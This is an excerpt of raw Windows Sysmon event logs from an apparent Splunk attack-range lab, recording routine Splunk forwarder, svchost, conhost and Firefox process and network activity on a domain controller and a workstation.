AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B49507DC667A5706BA31C350D49DFAE0,SHA256=6B18D8D6780ECCFFF2B8F4C412C3DADA8AD9C783DA576B0D7D7AFA06F8EC9E46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979056Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:53.229{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA9A53DC9D2A4457D94B5FF420D10079,SHA256=DD8E3F776DEE295957231248744BBE623738A6E3D99E8F7CBFC09C4B6BE76D8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050389Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:54.973{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2033D32F8D0B3922BB1CD661D2A98D7,SHA256=460A6C0406533AD51734C7B4E2DC1E2C4A0B5A093BB2B13DA04DFCA10580A49B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050388Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:54.973{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC8F195301AA3AAC84B9711C1C39E9D0,SHA256=2DA8F11BADB6B967E83068CB3B11C79E11D613A638D4D2B6174C3B0626581E62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050387Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:54.873{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=192CA2AFC1718B78E74A28DD4ABA0747,SHA256=C4ACC8DB5A033FE2DA8349F17CAEE153D7AAF9E1529460376E0C48241C8281C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979057Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:54.245{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77394849AF8F7619F1D83910AF2BAA0C,SHA256=DC3A3383238FC33539CB7E964045ACA0A3212969E37FF9A29BE447E7D46EEEB6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050386Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:54.789{5EBD8912-8B16-6151-3D7A-00000000FC01}46561132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050385Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:54.626{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B16-6151-3D7A-00000000FC01}4656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050384Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:54.626{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050383Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:54.626{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050382Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:54.626{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050381Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:54.626{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050380Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:54.626{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8B16-6151-3D7A-00000000FC01}4656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050379Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:54.626{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B16-6151-3D7A-00000000FC01}4656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050378Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:54.612{5EBD8912-8B16-6151-3D7A-00000000FC01}4656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001050377Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:54.151{5EBD8912-8B15-6151-3C7A-00000000FC01}68161176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050408Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.943{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B17-6151-3F7A-00000000FC01}5148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050407Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.943{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050406Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.943{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050405Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.943{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050404Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.943{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050403Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.943{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8B17-6151-3F7A-00000000FC01}5148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050402Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.943{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B17-6151-3F7A-00000000FC01}5148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050401Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.928{5EBD8912-8B17-6151-3F7A-00000000FC01}5148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050400Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.873{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99BF3E3A6B4D9E1FAE6A0F282ED3BAC1,SHA256=EE25CB334973D48427BEAB6B85B233E81FEEA0B1711A499F233EA65D6EFC9AD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979058Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:55.245{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F526F6A241C9917DC90868EBC727602B,SHA256=296F001CA0D801ABA0EFA0C148CF99FE381A4BBEDBAB61335448A7C6D09854C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050399Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.742{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001050398Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:52.796{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53380-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001050397Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.311{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B17-6151-3E7A-00000000FC01}4112C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050396Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.311{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050395Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.311{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050394Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.311{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050393Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 